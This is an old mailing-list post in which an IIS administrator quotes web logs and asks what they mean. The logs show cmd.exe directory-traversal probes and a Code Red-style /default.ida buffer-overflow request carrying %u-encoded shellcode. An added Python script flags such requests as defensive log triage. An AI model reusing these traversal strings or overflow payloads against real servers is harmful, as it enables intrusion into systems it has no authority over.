
[ProgSoc] What happened here...



I am running IIS. Looking at my web logs I see stuff like this all the
time:

2003-01-17 16:39:32 202.68.145.18 - 192.168.0.200 81 GET
/scripts/..Á../winnt/system32/cmd.exe /c+dir 404 -
2003-01-17 16:39:38 202.68.145.18 - 192.168.0.200 81 GET
/scripts/winnt/system32/cmd.exe /c+dir 404 -
2003-01-17 16:39:40 202.68.145.18 - 192.168.0.200 81 GET
/winnt/system32/cmd.exe /c+dir 404 -
2003-01-17 16:39:42 202.68.145.18 - 192.168.0.200 81 GET
/winnt/system32/cmd.exe /c+dir 404 -
2003-01-17 16:39:45 202.68.145.18 - 192.168.0.200 81 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 -
2003-01-17 16:39:47 202.68.145.18 - 192.168.0.200 81 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 -
2003-01-17 16:39:50 202.68.145.18 - 192.168.0.200 81 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 -
2003-01-17 16:39:52 202.68.145.18 - 192.168.0.200 81 GET
/scripts/..%2f../winnt/system32/cmd.exe /c+dir 404 -
2003-01-17 17:48:48 216.231.32.41 - 192.168.0.200 81 GET / - 400 -

It doesn't really faze me, because I see the 404 error. However, this
morning I found this:

2003-01-17 18:08:56 218.58.34.244 - 192.168.0.200 81 GET /default.ida
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucb
d3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00
=a 200 -

Seems to me to be a buffer overflow attack. Unfortunately it also
appears to have returned 200 OK.

I have nfi what this code might do. Any ideas? Am I screwed?

John.
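
Added example, not part of the original post: a small triage script for log lines shaped like the ones quoted above, which labels cmd.exe path probes and oversized .ida/.idq queries and separates requests the server rejected from ones it answered. The field order is assumed from the quoted lines; the sample lines, the addresses and the 200-character threshold are constructed for illustration.

```python
from urllib.parse import unquote

# Field order assumed from the quoted log lines (IIS W3C extended format).
FIELDS = ("date", "time", "c_ip", "user", "s_ip", "s_port",
          "method", "uri_stem", "uri_query", "status", "extra")
LONG_QUERY = 200  # assumed threshold for an abnormally long query string

def parse(line):
    """Split one log line into named fields; None if it has a different shape."""
    parts = line.split()
    return dict(zip(FIELDS, parts)) if len(parts) == len(FIELDS) else None

def classify(rec):
    """Return a label for the two request shapes seen in the post, else None."""
    # Decode %5c / %2f and normalise backslashes before matching the path.
    stem = unquote(rec["uri_stem"]).replace("\\", "/").lower()
    query = rec["uri_query"].lower()
    if stem.endswith("/cmd.exe"):
        return "cmd.exe probe"
    if stem.endswith((".ida", ".idq")) and (len(query) > LONG_QUERY or "%u" in query):
        return "oversized .ida/.idq query"
    return None

def triage(lines):
    """Return (client, label, status, verdict) for every suspicious line."""
    hits = []
    for line in lines:
        rec = parse(line)
        label = classify(rec) if rec else None
        if label:
            # 4xx/5xx: the server refused the request. Anything else was
            # answered and should be followed up on the host itself.
            verdict = "rejected" if rec["status"][0] in "45" else "needs review"
            hits.append((rec["c_ip"], label, rec["status"], verdict))
    return hits

# Constructed sample lines modelled on the post (documentation addresses).
SAMPLE = [
    "2003-01-17 16:39:45 198.51.100.18 - 192.0.2.200 81 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 -",
    "2003-01-17 16:39:52 198.51.100.18 - 192.0.2.200 81 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 404 -",
    "2003-01-17 17:48:48 203.0.113.41 - 192.0.2.200 81 GET / - 400 -",
    "2003-01-17 18:08:56 203.0.113.244 - 192.0.2.200 81 GET /default.ida " + "N" * 224 + "%u9090=a 200 -",
]

if __name__ == "__main__":
    for hit in triage(SAMPLE):
        print(*hit, sep="\t")
```

Log lines that an e-mail client has wrapped, as in the post, need to be rejoined into single lines before they are passed to `triage`.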

